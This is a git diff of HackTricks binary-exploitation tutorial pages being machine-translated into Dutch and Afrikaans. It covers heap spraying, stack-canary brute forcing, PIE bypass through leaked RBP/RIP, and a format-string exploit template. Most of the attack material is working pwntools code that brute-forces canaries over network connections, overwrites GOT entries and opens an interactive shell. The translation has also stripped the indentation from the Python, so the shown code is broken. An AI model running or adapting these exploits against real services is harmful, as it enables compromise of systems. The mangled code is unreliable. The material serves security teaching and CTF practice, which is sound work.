modificado de forma que ese size - nb sea < MINSIZE. - -Por ejemplo hará que poner en size 1552 para que 1552 - 1544 = 8 < MINSIZE (la resta no puede quedar negativa porque se compara un unsigned) - -Además se ha introducido un parche para hacerlo aún más complicado. +Bovendien is er een patch toegevoegd om het nog moeilijker te maken. **Heap Spraying** -Básicamente consiste en reservar tooda la memoria posible para heaps y rellenar estos con un colchón de nops acabados por una shellcode. Además, como colchón se utiliza 0x0c. Pues se intentará saltar a la dirección 0x0c0c0c0c, y así si se sobreescribe alguna dirección a la que se vaya a llamar con este colchón se saltará allí. Básicamente la táctica es reservar lo máximos posible para ver si se sobreescribe algún puntero y saltar a 0x0c0c0c0c esperando que allí haya nops. +Het bestaat er in wezen uit om zoveel mogelijk geheugen voor heaps te reserveren en deze te vullen met een nop-kussen gevolgd door een shellcode. Bovendien wordt 0x0c gebruikt als kussen. Er zal worden geprobeerd om naar het adres 0x0c0c0c0c te springen, zodat als een adres waar naartoe wordt gesprongen met dit kussen wordt overschreven, het daarheen zal springen. De tactiek is in feite om zoveel mogelijk te reserveren om te zien of er een pointer wordt overschreven en naar 0x0c0c0c0c te springen in de hoop dat er nops zijn. **Heap Feng Shui** -Consiste en mediante reservas y liberaciones sementar la memoria de forma que queden trozos reservados entre medias de trozos libres. El buffer a desbordar se situará en uno de los huevos. +Het bestaat erin om door middel van reserveringen en vrijgaven het geheugen zo te ordenen dat er gereserveerde stukken tussen de vrije stukken blijven zitten. De buffer die moet worden overlopen, wordt in een van de gaten geplaatst. -**objdump -d ejecutable** —> Disas functions\ -**objdump -d ./PROGRAMA | grep FUNCION** —> Get function address\ -**objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes\ -**objdump -t ./exec | grep varBss** —> Tabla de símbolos, para sacar address de variables y funciones\ -**objdump -TR ./exec | grep exit(func lib)** —> Para sacar address de funciones de librerías (GOT)\ +**objdump -d uitvoerbaar** -> Disassemblage van functies\ +**objdump -d ./PROGRAMMA | grep FUNCTIE** -> Krijg het adres van de functie\ +**objdump -d -Mintel ./shellcodeout** -> Om te controleren of het daadwerkelijk onze shellcode is en om de OpCodes te krijgen\ +**objdump -t ./exec | grep varBss** -> Symbooltabel, om het adres van variabelen en functies te krijgen\ +**objdump -TR ./exec | grep exit(func lib)** -> Om het adres van functies in bibliotheken (GOT) te krijgen\ **objdump -d ./exec | grep funcCode**\ **objdump -s -j .dtors /exec**\ **objdump -s -j .got ./exec**\ -**objdump -t --dynamic-relo ./exec | grep puts** —> Saca la dirección de puts a sobreescribir en le GOT\ -**objdump -D ./exec** —> Disas ALL hasta las entradas de la plt\ +**objdump -t --dynamic-relo ./exec | grep puts** -> Haalt het adres van puts op dat moet worden overschreven in de GOT\ +**objdump -D ./exec** -> Disassemblage van ALLES tot de plt-ingangen\ **objdump -p -/exec**\ -**Info functions strncmp —>** Info de la función en gdb +**Info functions strncmp ->** Info over de functie in gdb -## Interesting courses +## Interessante cursussen * [https://guyinatuxedo.github.io/](https://guyinatuxedo.github.io) * [https://github.com/RPISEC/MBE](https://github.com/RPISEC/MBE) -## **References** +## **Referenties** * [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacken van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf geadverteerd wilt zien in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md index dee81c565..53862970a 100644 --- a/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md +++ b/exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md @@ -1,114 +1,109 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.** +**As jy te doen het met 'n binêre lêer wat beskerm word deur 'n kanarie en PIE (Position Independent Executable), moet jy waarskynlik 'n manier vind om dit te omseil.** ![](<../../.gitbook/assets/image (144).png>) {% hint style="info" %} -Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ -However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting. +Let daarop dat **`checksec`** dalk nie kan vind dat 'n binêre lêer beskerm word deur 'n kanarie as dit staties gekompileer is en nie in staat is om die funksie te identifiseer nie.\ +Jy kan egter handmatig hiervan bewus raak as jy vind dat 'n waarde aan die begin van 'n funksieoproep in die stapel gestoor word en hierdie waarde voor die uittrede nagegaan word. {% endhint %} # Brute force Canary -The best way to bypass a simple canary is if the binary is a program **forking child processes every time you establish a new connection** with it (network service), because every time you connect to it **the same canary will be used**. +Die beste manier om 'n eenvoudige kanarie te omseil, is as die binêre lêer 'n program is wat **kindprosesse vorm elke keer as jy 'n nuwe verbinding** daarmee vestig (netwerkdienste), omdat elke keer as jy daarmee verbind, **dezelfde kanarie gebruik sal word**. -Then, the best way to bypass the canary is just to **brute-force it char by char**, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function **brute-forces an 8 Bytes canary (x64)** and distinguish between a correct guessed byte and a bad byte just **checking** if a **response** is sent back by the server (another way in **other situation** could be using a **try/except**): +Dan is die beste manier om die kanarie te omseil, om dit net **karakter vir karakter te brute force**, en jy kan uitvind of die gerade kanariebyte korrek was deur te kyk of die program afgekraak het of sy normale vloei voortgaan. In hierdie voorbeeld **brute force** die funksie **'n 8 byte kanarie (x64)** en onderskei tussen 'n korrek gerade byte en 'n slegte byte deur net te **kyk** of 'n **reaksie** deur die bediener teruggestuur word (in 'n **ander situasie** kan 'n **try/except** gebruik word): -## Example 1 - -This example is implemented for 64bits but could be easily implemented for 32 bits. +## Voorbeeld 1 +Hierdie voorbeeld is geïmplementeer vir 64-bits, maar kan maklik geïmplementeer word vir 32-bits. ```python from pwn import * def connect(): - r = remote("localhost", 8788) +r = remote("localhost", 8788) def get_bf(base): - canary = "" - guess = 0x0 - base += canary +canary = "" +guess = 0x0 +base += canary - while len(canary) < 8: - while guess != 0xff: - r = connect() +while len(canary) < 8: +while guess != 0xff: +r = connect() - r.recvuntil("Username: ") - r.send(base + chr(guess)) +r.recvuntil("Username: ") +r.send(base + chr(guess)) - if "SOME OUTPUT" in r.clean(): - print "Guessed correct byte:", format(guess, '02x') - canary += chr(guess) - base += chr(guess) - guess = 0x0 - r.close() - break - else: - guess += 1 - r.close() +if "SOME OUTPUT" in r.clean(): +print "Guessed correct byte:", format(guess, '02x') +canary += chr(guess) +base += chr(guess) +guess = 0x0 +r.close() +break +else: +guess += 1 +r.close() + +print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) +return base - print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary) - return base - canary_offset = 1176 base = "A" * canary_offset print("Brute-Forcing canary") base_canary = get_bf(base) #Get yunk data + canary CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary ``` +## Voorbeeld 2 -## Example 2 - -This is implemented for 32 bits, but this could be easily changed to 64bits.\ -Also note that for this example the **program expected first a byte to indicate the size of the input** and the payload. - +Dit is geïmplementeer vir 32-bits, maar dit kan maklik verander word na 64-bits.\ +Merk ook op dat vir hierdie voorbeeld die **program verwag eers 'n byte om die grootte van die inset aan te dui** en die payload. ```python from pwn import * # Here is the function to brute force the canary def breakCanary(): - known_canary = b"" - test_canary = 0x0 - len_bytes_to_read = 0x21 - - for j in range(0, 4): - # Iterate up to 0xff times to brute force all posible values for byte - for test_canary in range(0xff): - print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") - - # Send the current input size - target.send(len_bytes_to_read.to_bytes(1, "little")) +known_canary = b"" +test_canary = 0x0 +len_bytes_to_read = 0x21 - # Send this iterations canary - target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) +for j in range(0, 4): +# Iterate up to 0xff times to brute force all posible values for byte +for test_canary in range(0xff): +print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="") - # Scan in the output, determine if we have a correct value - output = target.recvuntil(b"exit.") - if b"YUM" in output: - # If we have a correct value, record the canary value, reset the canary value, and move on - print(" - next byte is: " + hex(test_canary)) - known_canary = known_canary + test_canary.to_bytes(1, "little") - len_bytes_to_read += 1 - break +# Send the current input size +target.send(len_bytes_to_read.to_bytes(1, "little")) - # Return the canary - return known_canary +# Send this iterations canary +target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little")) + +# Scan in the output, determine if we have a correct value +output = target.recvuntil(b"exit.") +if b"YUM" in output: +# If we have a correct value, record the canary value, reset the canary value, and move on +print(" - next byte is: " + hex(test_canary)) +known_canary = known_canary + test_canary.to_bytes(1, "little") +len_bytes_to_read += 1 +break + +# Return the canary +return known_canary # Start the target process target = process('./feedme') @@ -118,24 +113,22 @@ target = process('./feedme') canary = breakCanary() log.info(f"The canary is: {canary}") ``` +# Druk Kanarie -# Print Canary +'n Ander manier om die kanarie te omseil is om dit te **druk**.\ +Stel jou 'n situasie voor waar 'n **program vatbaar** vir stapoorvloei 'n **puts**-funksie kan uitvoer wat na 'n **deel** van die **stapoorvloei** wys. Die aanvaller weet dat die **eerste byte van die kanarie 'n nulbyte** (`\x00`) is en die res van die kanarie **willekeurige** bytes is. Dan kan die aanvaller 'n oorvloei skep wat die stapoorvloei oorskryf totdat net die eerste byte van die kanarie oorbly.\ +Dan roep die aanvaller die puts-funksionaliteit aan op die middel van die nutlading wat al die kanarie sal **druk** (behalwe die eerste nulbyte).\ +Met hierdie inligting kan die aanvaller 'n nuwe aanval **skep en stuur**, met kennis van die kanarie (in dieselfde programsessie). -Another way to bypass the canary is to **print it**.\ -Imagine a situation where a **program vulnerable** to stack overflow can execute a **puts** function **pointing** to **part** of the **stack overflow**. The attacker knows that the **first byte of the canary is a null byte** (`\x00`) and the rest of the canary are **random** bytes. Then, the attacker may create an overflow that **overwrites the stack until just the first byte of the canary**.\ -Then, the attacker **calls the puts functionalit**y on the middle of the payload which will **print all the canary** (except from the first null byte).\ -With this info the attacker can **craft and send a new attack** knowing the canary (in the same program session) - -Obviously, this tactic is very **restricted** as the attacker needs to be able to **print** the **content** of his **payload** to **exfiltrate** the **canary** and then be able to create a new payload (in the **same program session**) and **send** the **real buffer overflow**.\ -CTF example: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html) +Dit is duidelik dat hierdie taktiek baie **beperk** is, aangesien die aanvaller in staat moet wees om die **inhoud** van sy **nutlading** te **druk** om die **kanarie** uit te voer en dan 'n nuwe nutlading (in dieselfde programsessie) te skep en te **stuur** om die werklike stapoorvloei te veroorsaak.\ +CTF-voorbeeld: [https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csawquals17\_svc/index.html) # PIE -In order to bypass the PIE you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\ -For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.** - -To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP: +Om die PIE te omseil, moet jy **'n adres uitlek**. En as die binêre lêer nie enige adresse uitlek nie, is die beste om dit te doen om die **RBP en RIP wat in die stapel gestoor is, deur middel van bruto-krag** in die vatbare funksie te raai.\ +Byvoorbeeld, as 'n binêre lêer beskerm word deur beide 'n **kanarie** en **PIE**, kan jy begin om die kanarie bruto-krag te gebruik, dan sal die **volgende** 8 byte (x64) die gestoorde **RBP** wees en die **volgende** 8 byte sal die gestoorde **RIP** wees. +Om die RBP en die RIP van die binêre lêer bruto-krag te gebruik, kan jy uitvind dat 'n geldige geradeerde byte korrek is as die program iets uitvoer of net nie afkraak nie. Dieselfde funksie as die een wat voorsien is vir die bruto-krag van die kanarie, kan gebruik word om die RBP en die RIP bruto-krag te gebruik: ```python print("Brute-Forcing RBP") base_canary_rbp = get_bf(base_canary) @@ -144,41 +137,33 @@ print("Brute-Forcing RIP") base_canary_rbp_rip = get_bf(base_canary_rbp) RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:]) ``` +## Kry basisadres -## Get base address - -The last thing you need to defeat the PIE is to calculate **useful addresses from the leaked** addresses: the **RBP** and the **RIP**. - -From the **RBP** you can calculate **where are you writing your shell in the stack**. This can be very useful to know where are you going to write the string _"/bin/sh\x00"_ inside the stack. To calculate the distance between the leaked RBP and your shellcode you can just put a **breakpoint after leaking the RBP** an check **where is your shellcode located**, then, you can calculate the distance between the shellcode and the RBP: +Die laaste ding wat jy nodig het om die PIE te oorwin, is om nuttige adresse van die uitgelekde adresse te bereken: die RBP en die RIP. +Vanaf die RBP kan jy bereken waar jy jou skulp in die stapel skryf. Dit kan baie nuttig wees om te weet waar jy die string _"/bin/sh\x00"_ binne die stapel gaan skryf. Om die afstand tussen die uitgelekde RBP en jou skulpkode te bereken, kan jy net 'n breekpunt plaas nadat die RBP uitgelek is en kyk waar jou skulpkode geleë is. Dan kan jy die afstand tussen die skulpkode en die RBP bereken: ```python INI_SHELLCODE = RBP - 1152 ``` - -From the **RIP** you can calculate the **base address of the PIE binary** which is what you are going to need to create a **valid ROP chain**.\ -To calculate the base address just do `objdump -d vunbinary` and check the disassemble latest addresses: +Vanaf die **RIP** kan jy die **basisadres van die PIE-binêre lêer** bereken, wat jy nodig gaan hê om 'n **geldige ROP-ketting** te skep.\ +Om die basisadres te bereken, voer eenvoudig `objdump -d vunbinary` uit en kyk na die ontleedde jongste adresse: ![](<../../.gitbook/assets/image (145).png>) -In that example you can see that only **1 Byte and a half is needed** to locate all the code, then, the base address in this situation will be the **leaked RIP but finishing on "000"**. For example if you leaked _0x562002970**ecf** _ the base address is _0x562002970**000**_ - +In daardie voorbeeld kan jy sien dat slegs **1 byte en 'n half nodig is** om al die kode te lokaliseer, dus sal die basisadres in hierdie situasie die **uitgelekke RIP wees, maar eindig op "000"**. Byvoorbeeld, as jy _0x562002970**ecf**_ uitgelek het, is die basisadres _0x562002970**000**_. ```python elf.address = RIP - (RIP & 0xfff) ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/exploiting/linux-exploiting-basic-esp/format-strings-template.md b/exploiting/linux-exploiting-basic-esp/format-strings-template.md index f474a039a..6bf2f68dc 100644 --- a/exploiting/linux-exploiting-basic-esp/format-strings-template.md +++ b/exploiting/linux-exploiting-basic-esp/format-strings-template.md @@ -1,20 +1,16 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - ```python from pwn import * from time import sleep @@ -49,23 +45,23 @@ print(" ====================== ") def connect_binary(): - global P, ELF_LOADED, ROP_LOADED +global P, ELF_LOADED, ROP_LOADED - if LOCAL: - P = process(LOCAL_BIN) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +if LOCAL: +P = process(LOCAL_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets - elif REMOTETTCP: - P = remote('10.10.10.10',1338) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets +elif REMOTETTCP: +P = remote('10.10.10.10',1338) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets - elif REMOTESSH: - ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) - P = ssh_shell.process(REMOTE_BIN) # start the vuln binary - ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary - ROP_LOADED = ROP(elf)# Find ROP gadgets +elif REMOTESSH: +ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) +P = ssh_shell.process(REMOTE_BIN) # start the vuln binary +ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary +ROP_LOADED = ROP(elf)# Find ROP gadgets ####################################### @@ -73,39 +69,39 @@ def connect_binary(): ####################################### def send_payload(payload): - payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD - log.info("payload = %s" % repr(payload)) - if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") - P.sendline(payload) - sleep(0.5) - return P.recv() +payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD +log.info("payload = %s" % repr(payload)) +if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") +P.sendline(payload) +sleep(0.5) +return P.recv() def get_formatstring_config(): - global P +global P - for offset in range(1,1000): - connect_binary() - P.clean() +for offset in range(1,1000): +connect_binary() +P.clean() - payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" - recieved = send_payload(payload).strip() +payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() - if b"41" in recieved: - for padlen in range(0,4): - if b"41414141" in recieved: - connect_binary() - payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" - recieved = send_payload(payload).strip() - print(recieved) - if b"42424242" in recieved: - log.info(f"Found offset ({offset}) and padlen ({padlen})") - return offset, padlen +if b"41" in recieved: +for padlen in range(0,4): +if b"41414141" in recieved: +connect_binary() +payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" +recieved = send_payload(payload).strip() +print(recieved) +if b"42424242" in recieved: +log.info(f"Found offset ({offset}) and padlen ({padlen})") +return offset, padlen - else: - connect_binary() - payload = b" " + payload - recieved = send_payload(payload).strip() +else: +connect_binary() +payload = b" " + payload +recieved = send_payload(payload).strip() # In order to exploit a format string you need to find a position where part of your payload @@ -138,10 +134,10 @@ log.info(f"Printf GOT address: {hex(P_GOT)}") connect_binary() if GDB and not REMOTETTCP and not REMOTESSH: - # attach gdb and continue - # You can set breakpoints, for example "break *main" - gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" - sleep(5) +# attach gdb and continue +# You can set breakpoints, for example "break *main" +gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" +sleep(5) format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES) #format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR) @@ -153,21 +149,16 @@ format_string.execute_writes() P.interactive() ``` - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md index ed377cf1d..cb21cc761 100644 --- a/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/exploiting/linux-exploiting-basic-esp/fusion.md @@ -1,16 +1,14 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
